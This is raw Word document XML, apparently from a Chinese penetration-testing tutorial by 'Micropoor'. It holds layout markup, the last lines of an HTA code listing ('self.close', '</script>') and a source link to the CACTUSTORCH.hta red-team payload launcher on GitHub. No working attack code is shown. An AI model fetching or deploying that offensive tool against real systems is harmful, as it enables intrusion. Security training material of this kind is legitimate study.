        <v:shape style="position:absolute;left:2090;top:1630;width:110;height:230" coordorigin="2090,1630" coordsize="110,230" path="m2102,1648l2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2102,1648,2103,1648,2103,1648,2103,1648,2103,1648,2103,1648,2103,1648,2103,1648,2104,1648,2104,1648,2104,1648,2104,1648,2104,1648,2105,1648,2105,1648,2105,1648,2105,1648,2106,1648,2106,1648,2106,1648,2107,1648,2107,1648,2107,1648,2108,1648,2108,1648,2109,1648,2109,1648,2109,1648,2110,1648,2110,1648,2111,1648,2111,1648,2112,1648,2113,1648,2113,1648,2114,1648,2114,1648,2115,1648,2116,1648,2116,1648,2117,1648,2118,1648,2119,1648,2119,1648,2120,1648,2121,1648,2122,1648,2123,1648,2124,1648,2125,1648,2126,1648,2127,1648,2128,1648,2129,1648,2130,1648,2131,1648,2132,1648,2133,1648,2134,1648,2136,1648,2137,1648,2138,1648,2140,1648,2141,1648,2142,1648,2144,1648,2145,1648,2147,1648,2148,1648,2150,1648,2151,1648,2153,1648,2155,1648,2156,1648,2158,1648,2160,1648,2161,1648,2163,1648,2165,1648,2167,1648,2169,1648,2171,1648,2173,1648,2175,1648,2177,1648,2179,1648,2181,1648,2184,1648,2186,1648,2188,1648,2191,1648,2193,1648,2195,1648,2198,1648,2200,1648,2203,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1648,2205,1649,2205,1649,2205,1649,2205,1649,2205,1649,2205,1649,2205,1649,2205,1650,2205,1650,2205,1650,2205,1650,2205,1651,2205,1651,2205,1651,2205,1652,2205,1652,2205,1653,2205,1653,2205,1653,2205,1654,2205,1654,2205,1655,2205,1656,2205,1656,2205,1657,2205,1658,2205,1658,2205,1659,2205,1660,2205,1661,2205,1661,2205,1662,2205,1663,2205,1664,2205,1665,2205,1666,2205,1667,2205,1668,2205,1670,2205,1671,2205,1672,2205,1673,2205,1675,2205,1676,2205,1678,2205,1679,2205,1681,2205,1682,2205,1684,2205,1685,2205,1687,2205,1689,2205,1691,2205,1693,2205,1695,2205,1697,2205,1699,2205,1701,2205,1703,2205,1705,2205,1708,2205,1710,2205,1712,2205,1715,2205,1717,2205,1720,2205,1723,2205,1725,2205,1728,2205,1731,2205,1734,2205,1737,2205,1740,2205,1743,2205,1746,2205,1750,2205,1753,2205,1757,2205,1760,2205,1764,2205,1767,2205,1771,2205,1775,2205,1779,2205,1783,2205,1787,2205,1791,2205,1795,2205,1799,2205,1804,2205,1808,2205,1813,2205,1817,2205,1822,2205,1827,2205,1832,2205,1837,2205,1842,2205,1847,2205,1852,2205,1857,2205,1863,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2205,1868,2204,1868,2204,1868,2204,1868,2204,1868,2204,1868,2204,1868,2203,1868,2203,1868,2203,1868,2203,1868,2203,1868,2202,1868,2202,1868,2202,1868,2202,1868,2201,1868,2201,1868,2201,1868,2200,1868,2200,1868,2199,1868,2199,1868,2199,1868,2198,1868,2198,1868,2197,1868,2197,1868,2196,1868,2196,1868,2195,1868,2195,1868,2194,1868,2193,1868,2193,1868,2192,1868,2191,1868,2191,1868,2190,1868,2189,1868,2189,1868,2188,1868,2187,1868,2186,1868,2185,1868,2184,1868,2183,1868,2182,1868,2182,1868,2181,1868,2179,1868,2178,1868,2177,1868,2176,1868,2175,1868,2174,1868,2173,1868,2172,1868,2170,1868,2169,1868,2168,1868,2166,1868,2165,1868,2164,1868,2162,1868,2161,1868,2159,1868,2158,1868,2156,1868,2154,1868,2153,1868,2151,1868,2149,1868,2148,1868,2146,1868,2144,1868,2142,1868,2140,1868,2138,1868,2136,1868,2134,1868,2132,1868,2130,1868,2128,1868,2126,1868,2124,1868,2121,1868,2119,1868,2117,1868,2114,1868,2112,1868,2109,1868,2107,1868,2104,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1868,2102,1867,2102,1867,2102,1867,2102,1867,2102,1867,2102,1866,2102,1866,2102,1866,2102,1866,2102,1865,2102,1865,2102,1865,2102,1864,2102,1864,2102,1864,2102,1863,2102,1863,2102,1862,2102,1862,2102,1861,2102,1861,2102,1860,2102,1859,2102,1859,2102,1858,2102,1857,2102,1856,2102,1856,2102,1855,2102,1854,2102,1853,2102,1852,2102,1851,2102,1850,2102,1849,2102,1848,2102,1847,2102,1845,2102,1844,2102,1843,2102,1841,2102,1840,2102,1839,2102,1837,2102,1836,2102,1834,2102,1832,2102,1831,2102,1829,2102,1827,2102,1825,2102,1823,2102,1821,2102,1819,2102,1817,2102,1815,2102,1813,2102,1811,2102,1809,2102,1806,2102,1804,2102,1801,2102,1799,2102,1796,2102,1794,2102,1791,2102,1788,2102,1785,2102,1782,2102,1779,2102,1776,2102,1773,2102,1770,2102,1766,2102,1763,2102,1760,2102,1756,2102,1753,2102,1749,2102,1745,2102,1741,2102,1737,2102,1734,2102,1729,2102,1725,2102,1721,2102,1717,2102,1713,2102,1708,2102,1704,2102,1699,2102,1694,2102,1689,2102,1685,2102,1680,2102,1674,2102,1669,2102,1664,2102,1659,2102,1653,2102,1648e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:140.500pt;margin-top:81.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2810,1630" coordsize="110,230">
        <v:shape style="position:absolute;left:2810;top:1630;width:110;height:230" coordorigin="2810,1630" coordsize="110,230" path="m2828,1648l2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2828,1648,2829,1648,2829,1648,2829,1648,2829,1648,2829,1648,2829,1648,2829,1648,2829,1648,2830,1648,2830,1648,2830,1648,2830,1648,2830,1648,2831,1648,2831,1648,2831,1648,2831,1648,2832,1648,2832,1648,2832,1648,2832,1648,2833,1648,2833,1648,2834,1648,2834,1648,2834,1648,2835,1648,2835,1648,2836,1648,2836,1648,2837,1648,2837,1648,2838,1648,2838,1648,2839,1648,2839,1648,2840,1648,2841,1648,2841,1648,2842,1648,2843,1648,2843,1648,2844,1648,2845,1648,2846,1648,2846,1648,2847,1648,2848,1648,2849,1648,2850,1648,2851,1648,2852,1648,2853,1648,2854,1648,2855,1648,2856,1648,2857,1648,2858,1648,2859,1648,2861,1648,2862,1648,2863,1648,2864,1648,2866,1648,2867,1648,2868,1648,2870,1648,2871,1648,2873,1648,2874,1648,2876,1648,2877,1648,2879,1648,2881,1648,2882,1648,2884,1648,2886,1648,2888,1648,2889,1648,2891,1648,2893,1648,2895,1648,2897,1648,2899,1648,2901,1648,2903,1648,2905,1648,2908,1648,2910,1648,2912,1648,2914,1648,2917,1648,2919,1648,2922,1648,2924,1648,2926,1648,2929,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1648,2932,1649,2932,1649,2932,1649,2932,1649,2932,1649,2932,1649,2932,1649,2932,1650,2932,1650,2932,1650,2932,1650,2932,1651,2932,1651,2932,1651,2932,1652,2932,1652,2932,1653,2932,1653,2932,1653,2932,1654,2932,1654,2932,1655,2932,1656,2932,1656,2932,1657,2932,1658,2932,1658,2932,1659,2932,1660,2932,1661,2932,1661,2932,1662,2932,1663,2932,1664,2932,1665,2932,1666,2932,1667,2932,1668,2932,1670,2932,1671,2932,1672,2932,1673,2932,1675,2932,1676,2932,1678,2932,1679,2932,1681,2932,1682,2932,1684,2932,1685,2932,1687,2932,1689,2932,1691,2932,1693,2932,1695,2932,1697,2932,1699,2932,1701,2932,1703,2932,1705,2932,1708,2932,1710,2932,1712,2932,1715,2932,1717,2932,1720,2932,1723,2932,1725,2932,1728,2932,1731,2932,1734,2932,1737,2932,1740,2932,1743,2932,1746,2932,1750,2932,1753,2932,1757,2932,1760,2932,1764,2932,1767,2932,1771,2932,1775,2932,1779,2932,1783,2932,1787,2932,1791,2932,1795,2932,1799,2932,1804,2932,1808,2932,1813,2932,1817,2932,1822,2932,1827,2932,1832,2932,1837,2932,1842,2932,1847,2932,1852,2932,1857,2932,1863,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2932,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2931,1868,2930,1868,2930,1868,2930,1868,2930,1868,2930,1868,2930,1868,2929,1868,2929,1868,2929,1868,2929,1868,2929,1868,2928,1868,2928,1868,2928,1868,2927,1868,2927,1868,2927,1868,2926,1868,2926,1868,2926,1868,2925,1868,2925,1868,2924,1868,2924,1868,2923,1868,2923,1868,2922,1868,2922,1868,2921,1868,2921,1868,2920,1868,2920,1868,2919,1868,2918,1868,2918,1868,2917,1868,2916,1868,2915,1868,2915,1868,2914,1868,2913,1868,2912,1868,2911,1868,2911,1868,2910,1868,2909,1868,2908,1868,2907,1868,2906,1868,2905,1868,2904,1868,2902,1868,2901,1868,2900,1868,2899,1868,2898,1868,2896,1868,2895,1868,2894,1868,2892,1868,2891,1868,2890,1868,2888,1868,2887,1868,2885,1868,2884,1868,2882,1868,2881,1868,2879,1868,2877,1868,2875,1868,2874,1868,2872,1868,2870,1868,2868,1868,2866,1868,2864,1868,2862,1868,2860,1868,2858,1868,2856,1868,2854,1868,2852,1868,2850,1868,2847,1868,2845,1868,2843,1868,2840,1868,2838,1868,2836,1868,2833,1868,2830,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1868,2828,1867,2828,1867,2828,1867,2828,1867,2828,1867,2828,1866,2828,1866,2828,1866,2828,1866,2828,1865,2828,1865,2828,1865,2828,1864,2828,1864,2828,1864,2828,1863,2828,1863,2828,1862,2828,1862,2828,1861,2828,1861,2828,1860,2828,1859,2828,1859,2828,1858,2828,1857,2828,1856,2828,1856,2828,1855,2828,1854,2828,1853,2828,1852,2828,1851,2828,1850,2828,1849,2828,1848,2828,1847,2828,1845,2828,1844,2828,1843,2828,1841,2828,1840,2828,1839,2828,1837,2828,1836,2828,1834,2828,1832,2828,1831,2828,1829,2828,1827,2828,1825,2828,1823,2828,1821,2828,1819,2828,1817,2828,1815,2828,1813,2828,1811,2828,1809,2828,1806,2828,1804,2828,1801,2828,1799,2828,1796,2828,1794,2828,1791,2828,1788,2828,1785,2828,1782,2828,1779,2828,1776,2828,1773,2828,1770,2828,1766,2828,1763,2828,1760,2828,1756,2828,1753,2828,1749,2828,1745,2828,1741,2828,1737,2828,1734,2828,1729,2828,1725,2828,1721,2828,1717,2828,1713,2828,1708,2828,1704,2828,1699,2828,1694,2828,1689,2828,1685,2828,1680,2828,1674,2828,1669,2828,1664,2828,1659,2828,1653,2828,1648e x" fillcolor="#fefefe" stroke="f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54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0" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>212</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="117" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>213</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="100" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="354" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="8892" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>214</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="21"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>215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19" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来源：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="87" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>aw.githubusercontent.com/mdsecactivebreach/CACTUSTORCH/master/CACTUSTORCH.hta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="9778" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ropoor</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="continuous"/>
      <w:pgSz w:w="11920" w:h="16840"/>
      <w:pgMar w:header="0" w:footer="0"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seFELayout/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E9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 ?> 
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
	<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml" /> 
	<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" />
	<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" />
	<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml" /> 
	<Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml" /> 
	<Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" /> 
	<Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/7.jpeg" />
	<Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/8.jpeg" />
	<Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/9.jpeg" />
	<Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/10.jpeg" />
	<Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/11.jpeg" />
	<Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/12.jpeg" />
	<Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/13.jpeg" />
	<Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/14.jpeg" />
	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/15.jpeg" />
	<Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/16.jpeg" />
	<Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/17.jpeg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2011-11-21T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-21T15:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>